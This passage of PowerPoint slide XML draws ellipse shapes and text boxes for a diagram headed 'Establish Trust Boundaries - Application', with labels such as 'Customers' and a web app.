                    <a:pt x="751717" y="1579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="805057" y="6240"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857096" y="13867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907678" y="24341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956648" y="37546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1003851" y="53366"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049132" y="71684"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092337" y="92383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133309" y="115346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1171894" y="140456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207938" y="167598"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1241284" y="196653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271779" y="227506"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1299266" y="260039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323591" y="294136"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344600" y="329680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362136" y="366554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1376045" y="404641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386172" y="443826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392362" y="483990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1394459" y="525017"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1392362" y="566045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1386172" y="606209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1376045" y="645394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1362136" y="683481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1344600" y="720355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1323591" y="755899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1299266" y="789996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1271779" y="822529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1241284" y="853382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1207938" y="882437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1171894" y="909579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1133309" y="934689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1092337" y="957652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049132" y="978351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1003851" y="996669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="956648" y="1012489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907678" y="1025694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="857096" y="1036168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="805057" y="1043795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751717" y="1048456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697229" y="1050035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="642742" y="1048456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="589402" y="1043795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537363" y="1036168"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486781" y="1025694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437811" y="1012489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390608" y="996669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="345327" y="978351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302122" y="957652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261150" y="934689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222565" y="909579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186521" y="882437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153175" y="853382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122680" y="822529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95193" y="789996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70868" y="755899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49859" y="720355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32323" y="683481"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18414" y="645394"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8287" y="606209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2097" y="566045"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="525017"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="2895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305037" y="3289553"/>
              <a:ext cx="1109980" cy="753110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1109979" h="753110">
                  <a:moveTo>
                    <a:pt x="554735" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="498025" y="1943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442951" y="7647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389792" y="16923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338828" y="29581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290337" y="45432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244599" y="64287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201892" y="85956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162496" y="110251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126690" y="136983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94752" y="165961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66963" y="196998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43600" y="229903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24943" y="264488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11272" y="300563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2864" y="337939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="376428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2864" y="414916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11272" y="452292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24943" y="488367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43600" y="522952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66963" y="555857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94752" y="586894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126690" y="615872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162496" y="642604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201892" y="666899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244599" y="688568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290337" y="707423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338828" y="723274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389792" y="735932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442951" y="745208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498025" y="750912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554735" y="752856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611446" y="750912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666520" y="745208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719679" y="735932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770643" y="723274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819134" y="707423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864872" y="688568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907579" y="666899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946975" y="642604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982781" y="615872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014719" y="586894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042508" y="555857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065871" y="522952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084528" y="488367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1098199" y="452292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106607" y="414916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1109471" y="376428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106607" y="337939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1098199" y="300563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084528" y="264488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065871" y="229903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042508" y="196998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014719" y="165961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982781" y="136983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946975" y="110251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907579" y="85956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864872" y="64287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819134" y="45432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770643" y="29581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719679" y="16923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666520" y="7647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611446" y="1943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5547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8305037" y="3289553"/>
              <a:ext cx="1109980" cy="753110"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1109979" h="753110">
                  <a:moveTo>
                    <a:pt x="0" y="376428"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2864" y="337939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11272" y="300563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24943" y="264488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43600" y="229903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66963" y="196998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94752" y="165961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126690" y="136983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162496" y="110251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201892" y="85956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244599" y="64287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290337" y="45432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338828" y="29581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389792" y="16923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442951" y="7647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498025" y="1943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554735" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611446" y="1943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666520" y="7647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719679" y="16923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770643" y="29581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819134" y="45432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864872" y="64287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907579" y="85956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946975" y="110251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982781" y="136983"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014719" y="165961"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042508" y="196998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065871" y="229903"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084528" y="264488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1098199" y="300563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106607" y="337939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1109471" y="376428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106607" y="414916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1098199" y="452292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1084528" y="488367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1065871" y="522952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1042508" y="555857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1014719" y="586894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="982781" y="615872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="946975" y="642604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="907579" y="666899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864872" y="688568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819134" y="707423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="770643" y="723274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="719679" y="735932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="666520" y="745208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="611446" y="750912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554735" y="752856"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="498025" y="750912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="442951" y="745208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="389792" y="735932"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338828" y="723274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290337" y="707423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="244599" y="688568"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201892" y="666899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162496" y="642604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126690" y="615872"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="94752" y="586894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66963" y="555857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43600" y="522952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24943" y="488367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11272" y="452292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2864" y="414916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="376428"/>
                  </a:lnTo>
                  <a:close/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677681" y="3428239"/>
            <a:ext cx="360586" cy="452637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="13332" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="33645" marR="5078" indent="-21584" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-50" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black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prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>eb  App</a:t>
            </a:r>
            <a:endParaRPr sz="14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4885494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5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5" dirty="0"/>
              <a:t>Establish</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-55" dirty="0"/>
              <a:t>Trust</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Boundaries</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2499" b="0" spc="-5" dirty="0"/>
              <a:t>Application</a:t>
            </a:r>
            <a:endParaRPr sz="2499"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2516229" y="1653240"/>
            <a:ext cx="1300141" cy="422955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28955">
            <a:solidFill>
              <a:srgbClr val="006FC0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="144742" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="154259" defTabSz="914126">
              <a:spcBef>
                <a:spcPts val="1140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1799" spc="-15" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Customers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957677" y="2962650"/>
            <a:ext cx="1863874" cy="1230310"/>
            <a:chOff x="4958969" y="2962529"/>
            <a:chExt cx="1864360" cy="1230630"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4973574" y="2977134"/>
              <a:ext cx="1835150" cy="1201420"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1835150" h="1201420">
                  <a:moveTo>
                    <a:pt x="0" y="600455"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7147" y="525141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28017" y="452616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43329" y="417576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61750" y="383445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83171" y="350292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107486" y="318189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134586" y="287206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164365" y="257413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196716" y="228881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231530" y="201679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268700" y="175879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308119" y="151550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349679" y="128763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393273" y="107588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438794" y="88096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486134" y="70357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535185" y="54442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585841" y="40420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637994" y="28363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691535" y="18340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746359" y="10421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="802357" y="4678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859423" y="1181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975472" y="1181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032538" y="4678"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1088536" y="10421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1143360" y="18340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196901" y="28363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249054" y="40420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1299710" y="54442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348761" y="70357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1396101" y="88096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441622" y="107588"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485216" y="128763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1526776" y="151550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1566195" y="175879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603365" y="201679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638179" y="228881"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670530" y="257413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1700309" y="287206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727409" y="318189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1751724" y="350292"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773145" y="383445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1791566" y="417576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1806878" y="452616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827748" y="525141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1834896" y="600455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1833091" y="638427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1818975" y="712417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1791566" y="783335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1773145" y="817466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1751724" y="850619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727409" y="882722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1700309" y="913705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1670530" y="943498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1638179" y="972030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1603365" y="999232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1566195" y="1025032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1526776" y="1049361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485216" y="1072148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1441622" y="1093323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1396101" y="1112815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1348761" y="1130554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1299710" y="1146469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1249054" y="1160491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1196901" y="1172548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1143360" y="1182571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1088536" y="1190490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032538" y="1196233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="975472" y="1199730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="917448" y="1200911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="859423" y="1199730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="802357" y="1196233"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="746359" y="1190490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="691535" y="1182571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="637994" y="1172548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="585841" y="1160491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="535185" y="1146469"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486134" y="1130554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="438794" y="1112815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="393273" y="1093323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="349679" y="1072148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="308119" y="1049361"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="268700" y="1025032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231530" y="999232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196716" y="972030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164365" y="943498"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134586" y="913705"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107486" y="882722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83171" y="850619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61750" y="817466"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43329" y="783335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28017" y="748295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7147" y="675770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="600455"/>
                  </a:lnTo>
                  <a:close/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174742" y="3112770"/>
              <a:ext cx="1431290" cy="929640"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1431290" h="929639">
                  <a:moveTo>
                    <a:pt x="715518" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="656827" y="1541"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599444" y="6084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543553" y="13511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="489338" y="23701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="436983" y="36534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386672" y="51891"/>
                  </a:lnTo>
